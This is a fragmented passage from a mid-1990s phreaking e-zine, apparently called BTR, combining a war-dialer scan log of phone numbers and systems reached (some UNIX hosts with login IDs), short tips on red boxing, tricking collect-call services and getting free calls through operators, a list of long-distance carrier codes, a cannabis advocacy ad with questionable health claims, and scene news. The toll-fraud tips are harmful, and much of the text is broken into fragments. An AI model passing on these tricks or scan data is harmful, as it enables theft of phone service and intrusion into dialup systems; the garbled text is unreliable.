09:3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514 - Dead                      ��  12-25-1994  09:4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601 - Some very weird system    ��  12-25-1994  17:14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1740 - UNiX                      ��  12-27-1994  23:2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003 - Dead                      ��  12-28-1994  01:2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155 - Dead                      ��  12-28-1994  02:34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189 - Dead                      ��  12-28-1994  02:5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233 - Dead                      ��  12-28-1994  03:1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319 - Dead                      ��  12-28-1994  03:5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345 - Dead                      ��  12-28-1994  04:0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661 - Dead                      ��  12-28-1994  06:3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742 - Dead                      ��  12-28-1994  07:09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951 - Dead                      ��  12-28-1994  08:4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2959 - Dead                      ��  12-28-1994  08:5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292 - Dead                      ��  12-28-1994  14:1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355 - Modem, No Con             ��  12-28-1994  14:48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369 - OfficeMax StoreMax ]I[    ��  12-28-1994  14:54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419 - Dead                      ��  12-28-1994  15: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424 - Dead                      ��  12-28-1994  15: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501 - Dead                      ��  12-28-1994  16:54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511 - Fax                       ��  12-28-1994  16:5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554 - UNiX - SYNC SYNC11        ��  12-28-1994  17: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3776 - UNiX                      ��  12-29-1994  17:1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4287 - Different Terminal        ��  12-30-1994  03:2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4394 - SCoUNiX                   ��  12-30-1994  0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4452 - Dead                      ��  12-30-1994  04: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4892 - Dead                      ��  12-30-1994  08:0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4934 - Different Terminal        ��  12-30-1994  08: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161 - Unix                      ��  12-30-1994  10:05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176 - Dead                      ��  12-30-1994  10:1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215 - UNiX - ID: SYNC/SYNC11    ��  12-30-1994  14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344 - UNiX                      ��  01-03-1995  07:4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397 - Different Terminal        ��  01-03-1995  08:12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427 - (144)                     ��  01-03-1995  08:2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524 - Dead                      ��  01-03-1995  09:1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607 - Dead                      ��  01-03-1995  09:4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5917 - (1200)                    ��  01-03-1995  12:0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282 - Different Terminal        ��  01-03-1995  14:5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337 - Dead                      ��  01-05-1995  02:1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461 - Dead                      ��  01-05-1995  03:0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487 - Dead                      ��  01-05-1995  03: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538 - Dead                      ��  01-05-1995  03:3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543 - Dead                      ��  01-05-1995  03:3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551 - Dead                      ��  01-05-1995  03:4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588 - Dead                      ��  01-05-1995  03:5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799 - Dead                      ��  01-05-1995  05:2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822 - Dead                      ��  01-05-1995  05:36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916 - Dead                      ��  01-05-1995  06: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970 - Special Terminal          ��  01-05-1995  06:3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977 - UNiX                      ��  01-05-1995  06:4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6997 - UNiX                      ��  01-05-1995  06:4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7254 - (96oo)                    ��  01-05-1995  08:5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7500 - Dead                      ��  01-05-1995  10:43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7594 - Dead                      ��  01-05-1995  11:2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7718 - (12oo) Says Weird Shit    ��  01-05-1995  12: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459-8059 - Dead                      ��  01-05-1995  14:4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ot of werk so enjo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an Done sucessfully by PsychoScan 2.10 (PsychoScan's latest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TP sites including ftp.winternet.com, and spy.org. Also on AWoL [5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.ARTiCLE.13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TR Sh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� What are BTR Sh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 shorts are pieces of info that are too small for their ow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ir short pieces. Hence the name shorts. If you can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send to AWoL [518] 383-1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� Isn't Pilgrim Telephone (a New England Based Telco) pretty arro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ir collect calling service?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00] 382-5288 or [800] FUCK-A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800] 382-5624 or [800] FUCK-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ar a duck quack really loud then you Pilgrim Telephone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selves, then you hear "Enter The Number You Wish To Call"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N and then it'll ask for your name say "Dick" and it'll call tha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k if they'll accept a collect call from Dick. Without you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+ perso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� If you want a sure fire way to red box that always works then liste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to work you have to have a properly recorded to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up any 10xxx (tenex) code plus 1+ACN. Then it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t load of money. Like $1.35 for a local call. But since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ed theres nothing there to monitor how many coi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� New AC's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1 -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4 -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-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3 -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 - International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- Personal Communications Services (A SAC or Special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 -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 -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2 -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 -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4 -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0 -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� A Brief List of 10XXX (Tenex)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5 - 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88 -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33 -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88 - Metr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32 - Jok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33 - Jok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55 - Wil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58 - Wil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732 - AT&amp;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89 - Metr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11 - VarTe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880 - Opt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� Quick answer th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False you can always make free calls from a Coc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words of OJ Simpson, Absolutely, Positevely 100 percent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aiting for DT trick doesnt work then use your autodi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. But if that doesn't work call up the operator (0)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distance carrier, ie : ATT. Then say I need assistance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e #, you can't do 900's but you can do 800's and LD, + INT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works. Sometimes that even works on badly programmed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EGIN.AD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� HEMP CAN SAVE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abis hemp is known today primarily for its widespread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onal drug: Cannabis flowers when smoked or ingeste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phoric effects. Current gross domestic sales of marijuan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at $30 bill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less well known is that hemp is an invaluable and enviro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resource in many other areas as well. For example: "One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mp will make the same amount and quantity of paper as four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year old trees without the need for chlorine in the bl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creating no toxic dioxin poll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ture, hemp is the toughest natural fiber known; dem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 made from hemp sailcloth; canvas take its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annabis (Canv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p can also be used as a fuel. Old USDA reports show Hemp gives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the yield of cellulose per acre compared to corn.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converting cellulose to methanol make this a v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ution free method for powering cards, trucks, b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ly important are the uses of Hemp for food and medicine. Canna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yield as much edible oil per acre as sunflowers do; th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lp is second in protein only to that of soy beans. Federal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 prohibit research into additional benificial effect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abis is well known to be helpful fro glaucoma, asthma, anorex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ess, potentially replacing half the prescriptions writte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, "...there are simply no credible medical reports to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marijuana has caused a single death...". Too b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said of alcohol or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there is growing support for taking the 'crime' out of Canna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DA Judge Vaughn Walker notes, "I make no bones about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at the best course of action for us to take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 of action for us to take is exactly the same course w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hibition. And that is decrimin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ave the planet. Help legalize Hemp! Cannabis Action Network (C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with over 250 organizations worldwide. Call or write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vents in your area and how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ABIS AC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0 BANCROFT WAY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0) 486-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END.AD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� 20 Quick Facts On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annabis and hemp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ijuana" was the Mexican name giv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nnabis was first cultivated in China around 4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original drafts of the Declaration of Independenc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emp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ne acre of hemp will produce as much paper as 4 acres of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Hemp is a source of fiber and cloth and cordage for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George Washinton and Thomas Jefferson grew hemp. Washington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first president declared, "Make the most of the hemp seed.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ver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emp see is nature's perfect food. The oil from hemp seed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percentage of saturated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terilized hemp seed is commonly sold as bir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olling papers, like Bambu, are made from hemp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n 1937, the Marijuana Tax Stamp Act prohibited the use,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ltivation of hemp/marijuana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Five years later, during WWII, the US Dept. of Agricultu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m, "Hemp For Victory," which encouraged American far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hemp for the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emp is cultivated all over the world. Today, China, Kore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gary, Russia and France are among the countries that grow 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ber, paper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annabis is classified as a schedule 1 drug by the FDA.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arcotic, it cannot be prescribed by doctors to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n 1988, the DEA's own administravite law judge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ijuana is one of the safest, therapuetically activ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annabis can be used as a medicine to treat nausea, pain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sms. It alleviates symptons of glaucoma, MS, AIDS, migr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ebillitating ailmet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35 states have passed legistation permitting medical use of h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12 Americans recieve prescribed marijuana from the US gov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More than 400,000 Americans are arrested each year o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More than 400,000 Americans die from diseases related to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oking each year. More than 150,000 Americans die of alcohol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year. But in 10,000 years of usage no one has ever d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of marij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Packs an awesome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.ARTiCLE.14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TR News &amp; Shit Like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rew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BU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quid Sky Datacom (internet LSD.ORG) is no longer. Sysops Bax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arzau are in jail for letting users post valid CC's in the Ca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oo bad, LSD was advertised in 2600 mag, had it's own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3 28.8, and lots of hardware. Shit load of money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anything else like sentencing because I didn't se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article since I don't get tha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Service Announcem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amers that call the 2600 Voice BBS and don't post sh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? Are you alive? The thing is lame but it could be very go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sy just about 24/7. With only about 3 or less posts a day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cking sucks. So if you call you better hav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liked this issue of BTR. See you soon. BTR has no deadl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mes out from every 1 month to every month and a half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-[-]-[-]-[-]-[-]-[-]-[-]-[-]-[-]-[-]-[-]-[-]-[-]-[-]-[-]-[-]-[-]-[-]-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-+\+--+\+--+\+--+\+--+\+--+\+--+\+--+\+--+\+--+\+--+\+--+\+--+\+--+\+--+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Has Been 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Your New Year's Rev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Our V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s Like A Box Of Chocolates, You Never Know Who Your Gunn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+\+--+\+--+\+--+\+--+\+--+\+--+\+--+\+--+\+--+\+--+\+--+\+--+\+--+\+--+\+--+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